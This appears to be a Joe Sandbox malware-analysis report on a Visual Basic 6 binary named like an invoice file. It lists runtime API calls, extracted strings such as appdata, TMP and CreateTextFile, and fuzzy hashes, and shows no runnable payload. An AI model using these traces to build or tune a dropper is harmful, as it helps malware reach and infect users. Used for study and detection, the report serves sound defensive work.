__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,0000000A,000000ED), ref: 004203F1
#535.MSVBVM60 ref: 004203F9
__vbaVarDup.MSVBVM60 ref: 00420421
#667.MSVBVM60(?), ref: 0042042A
__vbaStrMove.MSVBVM60(?), ref: 00420434
__vbaStrMove.MSVBVM60(00000011,?), ref: 00420451
#514.MSVBVM60(00000000,00000011,?), ref: 00420457
__vbaStrMove.MSVBVM60(00000000,00000011,?), ref: 00420461
__vbaStrCopy.MSVBVM60(00000000,00000011,?), ref: 00420471
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000,00000000,00000011,?), ref: 00420484
__vbaFreeVar.MSVBVM60 ref: 0042048F
#697.MSVBVM60(00006488), ref: 00420499
__vbaStrMove.MSVBVM60(00006488), ref: 004204A3
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,0000000A,00000000,Sternotracheal5,000000C1), ref: 004204C2
#528.MSVBVM60(?,0000000A,?,?,?,?,?,?,?,?,?,?,?,?,0000000A,00000000), ref: 004204CF
#517.MSVBVM60(picktooth,?,0000000A,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 004204D9
__vbaVarTstNe.MSVBVM60(00008008,?,picktooth,?,0000000A), ref: 004204F0
__vbaFreeVarList.MSVBVM60(00000003,0000000A,?,00008008,00008008,?,picktooth,?,0000000A), ref: 0042050A
__vbaLenBstrB.MSVBVM60(INFRASCAPULAR), ref: 00420537
__vbaNew2.MSVBVM60(00402D44,004223F0,INFRASCAPULAR), ref: 0042056A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 004205CC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,00000108), ref: 0042062B
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,00000108), ref: 0042064D
#581.MSVBVM60(tungtvejendes), ref: 00420657
__vbaFpI4.MSVBVM60(tungtvejendes), ref: 0042065C
__vbaFreeStr.MSVBVM60(004206B6,tungtvejendes), ref: 004206A8
__vbaFreeStr.MSVBVM60(004206B6,tungtvejendes), ref: 004206B0

Strings

INCOGNITE, xrefs: 004208F4
Sternotracheal5, xrefs: 00420335
\uLeVLTlngarzDsxDxFry75Ru4, xrefs: 00420AC9
Wrothily, xrefs: 004208C0
picktooth, xrefs: 004204D4
Skifflegrupperne, xrefs: 00420A77
tungtvejendes, xrefs: 00420652
\Bh2BSU9xxO49MYboEPptixGKslvKjoQApxmsXHE151, xrefs: 004207B6
\Ffbziag21THawVfLdzos3x101, xrefs: 00420984
userprofile, xrefs: 00420407
Scripting.FileSystemObject, xrefs: 00420935
Umload4, xrefs: 00420A23
INFRASCAPULAR, xrefs: 00420532
Lejevrdistigningernes, xrefs: 0042038B
Velseslokaler2, xrefs: 00420833
appdata, xrefs: 00420790, 00420AA3
CreateTextFile, xrefs: 004209E0
TMP, xrefs: 0042095E
Desarmering4, xrefs: 004204A8

Memory Dump Source

Source File: 00000001.00000002.21867138817.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.21867120301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.21867292253.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Free$Move$CopyList$#514CheckHresult$#515#517#528#535#581#648#667#696#697BstrChkstkNew2
String ID: CreateTextFile$Desarmering4$INCOGNITE$INFRASCAPULAR$Lejevrdistigningernes$Scripting.FileSystemObject$Skifflegrupperne$Sternotracheal5$TMP$Umload4$Velseslokaler2$Wrothily$\Bh2BSU9xxO49MYboEPptixGKslvKjoQApxmsXHE151$\Ffbziag21THawVfLdzos3x101$\uLeVLTlngarzDsxDxFry75Ru4$appdata$picktooth$tungtvejendes$userprofile
API String ID: 3606919766-1028660707
Opcode ID: e2fb398d311ba17dbc9b5ca092fbc3145fe999b1f7a1fee7aede9f6dfb758483
Instruction ID: 881ca92dfe5f261a31e04b3e40a9012ada558439fc7f63fe75374041b4814d6c
Opcode Fuzzy Hash: e2fb398d311ba17dbc9b5ca092fbc3145fe999b1f7a1fee7aede9f6dfb758483
Instruction Fuzzy Hash: 73522C71900208ABDB11EFA1CD46FDEB7B8AF04304F50457AF505BB1E2DB799A49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004025B4, Relevance: 15.1, APIs: 10, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(00000000,00401396,?,?,?,00000000), ref: 00420BC3
__vbaObjSetAddref.MSVBVM60(00000000,?,?,00000000,?,00000000,00401396), ref: 00420BDC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402958,00000058), ref: 00420C08
__vbaObjSetAddref.MSVBVM60(?,?), ref: 00420C23
#644.MSVBVM60(?,?,?), ref: 00420C2C
__vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 00420C3D
__vbaChkstk.MSVBVM60(00000000,?,?,00000000,?,?,?), ref: 00420C82
__vbaChkstk.MSVBVM60(00000000,?,?,00000000,?,?,?), ref: 00420C93
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402958,000002B0), ref: 00420CCA
__vbaFreeObj.MSVBVM60(00420CF1), ref: 00420CEB

Memory Dump Source

Source File: 00000001.00000002.21867138817.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.21867120301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.21867292253.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
String ID:
API String ID: 1032928638-0
Opcode ID: e56b674742cfc386bfc9e71206ad499bd21cd30ccd20008f7ef8374e30aef507
Instruction ID: 2c8f50cf0ce147b20e5c8e33546bec5075f2dad1807e2f3c839ccf2d5c2f7f20
Opcode Fuzzy Hash: e56b674742cfc386bfc9e71206ad499bd21cd30ccd20008f7ef8374e30aef507
Instruction Fuzzy Hash: 04315AB1940618EFDF01EF91D84AADEBBB5FF04304F50442AF900BB5A1C7B99986DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401698, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040169D

Strings

VB5!6&*, xrefs: 00401698

Memory Dump Source

Source File: 00000001.00000002.21867138817.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.21867120301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.21867292253.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FACTURAS.jbxd

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: e1752afb24743ca4060ea10a760c120a02f7b9768a50a4e9100c73e35c553a1d
Instruction ID: e6b7c8c99325a19c608c6956ad72a83e219003d2e08a957c1b7b9cdcc9dd46e4
Opcode Fuzzy Hash: e1752afb24743ca4060ea10a760c120a02f7b9768a50a4e9100c73e35c553a1d
Instruction Fuzzy Hash: 0A31FCA584E7D05FD7039B305D2A6917FB09E13224B1E49EBC0C1DF5E3E26E0809C726

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004025A7, Relevance: 140.3, APIs: 68, Strings: 12, Instructions: 348
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(00000000,00401396), ref: 004206F3
__vbaStrCopy.MSVBVM60(?,00000000,?,00000000,00401396), ref: 0042070B
#583.MSVBVM60(?,?,?,00000000,?,00000000,00401396), ref: 0042071B
__vbaFpR8.MSVBVM60(?,?,?,00000000,?,00000000,00401396), ref: 00420720
#539.MSVBVM60(000000C8,000000C8,0000002E,00000013,?,?,?,00000000,?,00000000,00401396), ref: 00420741
#522.MSVBVM60(?,000000C8,000000C8,000000C8,0000002E,00000013,?,?,?,00000000,?,00000000,00401396), ref: 0042074E
__vbaStrVarMove.MSVBVM60(?,?,000000C8,000000C8,000000C8,0000002E,00000013,?,?,?,00000000,?,00000000,00401396), ref: 00420757
__vbaStrMove.MSVBVM60(?,?,000000C8,000000C8,000000C8,0000002E,00000013,?,?,?,00000000,?,00000000,00401396), ref: 00420761
__vbaStrCopy.MSVBVM60(?,?,000000C8,000000C8,000000C8,0000002E,00000013,?,?,?,00000000,?,00000000,00401396), ref: 00420771
__vbaFreeStr.MSVBVM60(?,?,000000C8,000000C8,000000C8,0000002E,00000013,?,?,?,00000000,?,00000000,00401396), ref: 00420779
__vbaFreeVarList.MSVBVM60(00000002,000000C8,?,?,?,000000C8,000000C8,000000C8,0000002E,00000013,?,?,?,00000000,?,00000000), ref: 00420788
__vbaVarDup.MSVBVM60 ref: 004207A4
#666.MSVBVM60(?,?), ref: 004207B1
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,?,?), ref: 004207D6
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,?,?), ref: 004207DC
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,?,?), ref: 004207E6
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,?), ref: 004207F5
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,?), ref: 004207FD
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,?), ref: 00420810
__vbaGet3.MSVBVM60(00000000,?,00000001), ref: 00420825
__vbaFileClose.MSVBVM60(00000001,00000000,?,00000001), ref: 0042082C
#618.MSVBVM60(Velseslokaler2,00000015,00000001,00000000,?,00000001), ref: 00420838
__vbaStrMove.MSVBVM60(Velseslokaler2,00000015,00000001,00000000,?,00000001), ref: 00420842
#617.MSVBVM60(?,00000008,000000F6), ref: 00420871
__vbaStrVarMove.MSVBVM60(?,?,00000008,000000F6), ref: 0042087A
__vbaStrMove.MSVBVM60(?,?,00000008,000000F6), ref: 00420884
__vbaFreeStr.MSVBVM60(?,?,00000008,000000F6), ref: 0042088C
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,000000F6), ref: 0042089B
__vbaStrCopy.MSVBVM60(?,?,?,00000000,?,00000000,00401396), ref: 004208CE
#515.MSVBVM60(?,00004008,00000037), ref: 004208EF
__vbaVarTstEq.MSVBVM60(?,?,?,00004008,00000037), ref: 00420910
__vbaFreeVar.MSVBVM60(?,?,?,00004008,00000037), ref: 0042091F
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 0042093E
__vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 00420947
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 00420951
__vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 00420959
__vbaVarDup.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 00420972
#666.MSVBVM60(?,?,?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 0042097F
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 004209B5
__vbaChkstk.MSVBVM60(?,00000008,?,?,?,?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 004209BF
__vbaChkstk.MSVBVM60(?,00000008,?,?,?,?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 004209CD
__vbaLateMemCallLd.MSVBVM60(?,?,CreateTextFile,00000002,?,00000008,?,?,?,?,00000000,?,?,Scripting.FileSystemObject,00000000,?), ref: 004209EC
__vbaObjVar.MSVBVM60(00000000,?,?,?,?,?,00000000,?,00000000,00401396), ref: 004209F5
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,?,?,?,?,00000000,?,00000000,00401396), ref: 00420A04
__vbaFreeVarList.MSVBVM60(00000004,00000000,?,?,?,?,00000000,00000000,?,?,?,?,?,00000000,?,00000000), ref: 00420A1B
__vbaVarDup.MSVBVM60 ref: 00420A37
#518.MSVBVM60(?,00000000), ref: 00420A44
__vbaStrVarMove.MSVBVM60(?,?,00000000), ref: 00420A4D
__vbaStrMove.MSVBVM60(?,?,00000000), ref: 00420A57
__vbaFreeVarList.MSVBVM60(00000002,00000000,?,?,?,00000000), ref: 00420A66
__vbaStrCat.MSVBVM60(Skifflegrupperne,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,00000000), ref: 00420A7C
__vbaStrMove.MSVBVM60(Skifflegrupperne,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,00000000), ref: 00420A86
__vbaStrCopy.MSVBVM60(Skifflegrupperne,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,00000000), ref: 00420A96
__vbaFreeStr.MSVBVM60(Skifflegrupperne,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,00000000), ref: 00420A9E
__vbaVarDup.MSVBVM60(Skifflegrupperne,?), ref: 00420AB7
#666.MSVBVM60(?,00000000), ref: 00420AC4
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,?,00000000), ref: 00420AE9
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,?,00000000), ref: 00420AEF
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,?,00000000), ref: 00420AF9
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,00000000), ref: 00420B08
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,00000000), ref: 00420B10
__vbaFreeVarList.MSVBVM60(00000003,00000000,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,00000000), ref: 00420B23
__vbaGet3.MSVBVM60(00000000,?,00000001,?,?,Skifflegrupperne,?,?,?,?,?,?,?,00000000,00000000), ref: 00420B38
__vbaFileClose.MSVBVM60(00000001,00000000,?,00000001,?,?,Skifflegrupperne,?,?,?,?,?,?,?,00000000,00000000), ref: 00420B3F
__vbaFreeStr.MSVBVM60(00420B90,?,?,?,00004008,00000037), ref: 00420B72
__vbaFreeStr.MSVBVM60(00420B90,?,?,?,00004008,00000037), ref: 00420B7A
__vbaFreeStr.MSVBVM60(00420B90,?,?,?,00004008,00000037), ref: 00420B82
__vbaFreeObj.MSVBVM60(00420B90,?,?,?,00004008,00000037), ref: 00420B8A
__vbaErrorOverflow.MSVBVM60(00000000), ref: 00420BA3
__vbaChkstk.MSVBVM60(00000000,00401396,?,?,?,00000000), ref: 00420BC3
__vbaObjSetAddref.MSVBVM60(00000000,?,?,00000000,?,00000000,00401396), ref: 00420BDC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402958,00000058), ref: 00420C08
__vbaObjSetAddref.MSVBVM60(?,?), ref: 00420C23
#644.MSVBVM60(?,?,?), ref: 00420C2C
__vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 00420C3D
__vbaChkstk.MSVBVM60(00000000,?,?,00000000,?,?,?), ref: 00420C82
__vbaChkstk.MSVBVM60(00000000,?,?,00000000,?,?,?), ref: 00420C93
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402958,000002B0), ref: 00420CCA

Strings

\Ffbziag21THawVfLdzos3x101, xrefs: 00420984
INCOGNITE, xrefs: 004208F4
Scripting.FileSystemObject, xrefs: 00420935
Umload4, xrefs: 00420A23
\uLeVLTlngarzDsxDxFry75Ru4, xrefs: 00420AC9
Velseslokaler2, xrefs: 00420833
Wrothily, xrefs: 004208C0
appdata, xrefs: 00420790, 00420AA3
CreateTextFile, xrefs: 004209E0
TMP, xrefs: 0042095E
Skifflegrupperne, xrefs: 00420A77
\Bh2BSU9xxO49MYboEPptixGKslvKjoQApxmsXHE151, xrefs: 004207B6

Memory Dump Source

Source File: 00000001.00000002.21867138817.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.21867120301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.21867292253.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Free$Move$ChkstkList$AddrefCopyFile$#666$CheckCloseGet3HresultOpen$#515#518#522#539#583#617#618#644#716CallErrorLateOverflow
String ID: CreateTextFile$INCOGNITE$Scripting.FileSystemObject$Skifflegrupperne$TMP$Umload4$Velseslokaler2$Wrothily$\Bh2BSU9xxO49MYboEPptixGKslvKjoQApxmsXHE151$\Ffbziag21THawVfLdzos3x101$\uLeVLTlngarzDsxDxFry75Ru4$appdata
API String ID: 1779615046-1518413975
Opcode ID: 9d1e0a08e5482c7ca490eed888a6b294d425b6580b1abfdadb9551e8663a33e4
Instruction ID: d7e615faf12afc61e80ff9e12dc828bb634d5045919a83b4002146fdaeba8755
Opcode Fuzzy Hash: 9d1e0a08e5482c7ca490eed888a6b294d425b6580b1abfdadb9551e8663a33e4
Instruction Fuzzy Hash: 90D12171900108ABDB01EBE1CD46FDEB7BCAF14308F50457AB505BB1E2DB79AB098B58

Uniqueness

Uniqueness Score: -1.00%

Function 00402566, Relevance: 101.8, APIs: 53, Strings: 5, Instructions: 310
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(00000000,00401396,?,Wayment7,?), ref: 0041F5C7
__vbaStrCopy.MSVBVM60(?,?,?,00000000,00401396,?), ref: 0041F5F1
__vbaStrCopy.MSVBVM60(?,?,?,00000000,00401396,?), ref: 0041F5FC
__vbaFpCDblR8.MSVBVM60(?,?,?,00000000,00401396,?), ref: 0041F607
__vbaNew2.MSVBVM60(00402D44,004223F0,?,?,?,00000000,00401396,?), ref: 0041F62E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 0041F690
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,000000B8), ref: 0041F6EF
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,000000B8), ref: 0041F711
__vbaVarDup.MSVBVM60(00000000,?,00402D54,000000B8), ref: 0041F733
#528.MSVBVM60(?,?), ref: 0041F740
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041F749
__vbaStrMove.MSVBVM60(?,?,?), ref: 0041F753
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041F762
__vbaVarDup.MSVBVM60 ref: 0041F787
#606.MSVBVM60(000000C8,?), ref: 0041F795
__vbaStrMove.MSVBVM60(000000C8,?), ref: 0041F79F
__vbaStrMove.MSVBVM60(000000D1,000000C8,?), ref: 0041F7BF
#514.MSVBVM60(00000000,000000D1,000000C8,?), ref: 0041F7C5
__vbaStrMove.MSVBVM60(00000000,000000D1,000000C8,?), ref: 0041F7CF
__vbaStrCopy.MSVBVM60(00000000,000000D1,000000C8,?), ref: 0041F7DF
#660.MSVBVM60(?,00000003,0000000A,00000001,00000001), ref: 0041F85A
__vbaVarTstEq.MSVBVM60(00008008,?), ref: 0041F87E
__vbaFreeVarList.MSVBVM60(00000003,00000003,0000000A,?,00008008,?), ref: 0041F898
#536.MSVBVM60(00000003), ref: 0041F8C1
__vbaStrMove.MSVBVM60(00000003), ref: 0041F8CB
__vbaFreeVar.MSVBVM60(00000003), ref: 0041F8D3
__vbaNew2.MSVBVM60(00402D44,004223F0,00000003), ref: 0041F8EB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 0041F94D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,000000F8), ref: 0041F9A9
__vbaStrMove.MSVBVM60(00000000,?,00402D54,000000F8), ref: 0041F9D3
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,000000F8), ref: 0041F9DB
#512.MSVBVM60(PHYSIANTHROPY,000000C9), ref: 0041F9EA

Strings

Chemotropism1, xrefs: 0041F716
Gatfinnes, xrefs: 0041F802
Formindskedes7, xrefs: 0041F85F
APETALOUSNESS, xrefs: 0041FA11
PHYSIANTHROPY, xrefs: 0041F9E5

Memory Dump Source

Source File: 00000001.00000002.21867138817.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.21867120301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.21867292253.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Move$Free$CheckHresult$Copy$ListNew2$#512#514#528#536#606#660Chkstk
String ID: APETALOUSNESS$Chemotropism1$Formindskedes7$Gatfinnes$PHYSIANTHROPY
API String ID: 1955365611-3622351583
Opcode ID: 16d6795c5c28a47c3c6ddddedfa4f20aac65ff98b6dc54da51977e5c6a567074
Instruction ID: 732b38055afd9a27224fea2122834edf62b8d72386851646c05db079df4f24cb
Opcode Fuzzy Hash: 16d6795c5c28a47c3c6ddddedfa4f20aac65ff98b6dc54da51977e5c6a567074
Instruction Fuzzy Hash: DDD13571900218ABDB10EFA1CC55FDEB7B9BF04304F1445BAE10ABB1A1DB785A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041DC5D, Relevance: 87.7, APIs: 45, Strings: 5, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 0041DC7B
__vbaStrCopy.MSVBVM60(?,?,?,?,00401396), ref: 0041DCB3
#572.MSVBVM60(00000002), ref: 0041DCD1
__vbaStrMove.MSVBVM60(00000002), ref: 0041DCDB
__vbaLenBstr.MSVBVM60(00000000,00000002), ref: 0041DCE1
#536.MSVBVM60(00000003,?,?,00000000,00000002), ref: 0041DCF4
__vbaStrMove.MSVBVM60(00000003,?,?,00000000,00000002), ref: 0041DCFE
__vbaStrCopy.MSVBVM60(00000003,?,?,00000000,00000002), ref: 0041DD0B
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000003,?,?,00000000,00000002), ref: 0041DD1A
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,00401396), ref: 0041DD2C
__vbaLenBstr.MSVBVM60(Julentters7,?,?,?,?,?,00401396), ref: 0041DD40
__vbaStrI4.MSVBVM60(00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD46
__vbaStrMove.MSVBVM60(00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD50
#517.MSVBVM60(00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD56
__vbaStrMove.MSVBVM60(00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD60
#512.MSVBVM60(Ellagate,0000000F,00000000,00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD6D
__vbaStrMove.MSVBVM60(Ellagate,0000000F,00000000,00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD77
#521.MSVBVM60(00000000,Ellagate,0000000F,00000000,00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD7D
__vbaStrMove.MSVBVM60(00000000,Ellagate,0000000F,00000000,00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD87
__vbaStrCmp.MSVBVM60(00000000,00000000,Ellagate,0000000F,00000000,00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD8D
__vbaFreeStrList.MSVBVM60(00000004,?,00000000,00000000,00000000,00000000,00000000,Ellagate,0000000F,00000000,00000000,00000000,Julentters7), ref: 0041DDB4
__vbaOnError.MSVBVM60(000000FF,0000000F,00000000,00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DDD4
#541.MSVBVM60(?,18:18:18,000000FF,0000000F,00000000,00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DDE9
__vbaStrVarVal.MSVBVM60(?,?,?,18:18:18,000000FF,0000000F,00000000,00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DDF6
#578.MSVBVM60(00000000,?,?,?,18:18:18,000000FF,0000000F,00000000,00000000,00000000,Julentters7), ref: 0041DDFC
__vbaFreeStr.MSVBVM60(00000000,?,?,?,18:18:18,000000FF,0000000F,00000000,00000000,00000000,Julentters7), ref: 0041DE07
__vbaFreeVar.MSVBVM60(00000000,?,?,?,18:18:18,000000FF,0000000F,00000000,00000000,00000000,Julentters7), ref: 0041DE0F
__vbaNew2.MSVBVM60(00402D44,004223F0,00000000,?,?,?,18:18:18,000000FF,0000000F,00000000,00000000,00000000,Julentters7), ref: 0041DE2E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 0041DE90
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,00000060), ref: 0041DEE6
__vbaStrCopy.MSVBVM60(00000000,?,00402D54,00000060), ref: 0041DF03
__vbaFreeStr.MSVBVM60(00000000,?,00402D54,00000060), ref: 0041DF0B
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,00000060), ref: 0041DF13
#703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF40
__vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF4A
__vbaStrCopy.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF5A
__vbaFreeStr.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF62
__vbaFreeVar.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF6A
__vbaStrCat.MSVBVM60(ORY,?,00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF7E
__vbaStrMove.MSVBVM60(ORY,?,00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF88
__vbaStrCat.MSVBVM60(Spindersken,00000000,ORY,?,00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF93
__vbaStrMove.MSVBVM60(Spindersken,00000000,ORY,?,00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF9D
__vbaFreeStr.MSVBVM60(Spindersken,00000000,ORY,?,00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DFA5
__vbaFreeStr.MSVBVM60(0041E005,0000000F,00000000,00000000,00000000,Julentters7), ref: 0041DFF7
__vbaFreeStr.MSVBVM60(0041E005,0000000F,00000000,00000000,00000000,Julentters7), ref: 0041DFFF

Strings

Julentters7, xrefs: 0041DD3B
18:18:18, xrefs: 0041DDE0
Spindersken, xrefs: 0041DF8E
ORY, xrefs: 0041DF79
Ellagate, xrefs: 0041DD68

Memory Dump Source

Source File: 00000001.00000002.21867138817.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.21867120301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.21867292253.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Free$Move$Copy$List$BstrCheckHresult$#512#517#521#536#541#572#578#703ChkstkErrorNew2
String ID: 18:18:18$Ellagate$Julentters7$ORY$Spindersken
API String ID: 1281597053-645609369
Opcode ID: ccabde8878ab7179b76e5d42c4046a2c41d0b470078240cda4dea7da4b9a5a5c
Instruction ID: b2992b798e6caff2460da47ab91e29450ee0ed1523a875fe7bb5fa0d7dd09224
Opcode Fuzzy Hash: ccabde8878ab7179b76e5d42c4046a2c41d0b470078240cda4dea7da4b9a5a5c
Instruction Fuzzy Hash: A1913E71D00208ABDB00EFA1DD56FDEB7B9AF14308F20456AF106BB1E1DB795E458B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041FDD6, Relevance: 58.0, APIs: 30, Strings: 3, Instructions: 240
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 0041FDF3
__vbaLenBstrB.MSVBVM60(EKSPROPRIATIONSFORRETNINGER,?,?,?,?,00401396), ref: 0041FE0A
#574.MSVBVM60(00000003,?,?,?,?,EKSPROPRIATIONSFORRETNINGER,?,?,?,?,00401396), ref: 0041FE1D
__vbaStrMove.MSVBVM60(00000003,?,?,?,?,EKSPROPRIATIONSFORRETNINGER,?,?,?,?,00401396), ref: 0041FE27
#617.MSVBVM60(?,00000008,000000AE,?,?,?,00000003,?,?,?,?,EKSPROPRIATIONSFORRETNINGER), ref: 0041FE56
__vbaVarDup.MSVBVM60 ref: 0041FE78
#667.MSVBVM60(?), ref: 0041FE81
__vbaVarTstEq.MSVBVM60(00008008,?,?), ref: 0041FE98
__vbaFreeStr.MSVBVM60(00008008,?,?), ref: 0041FEA7
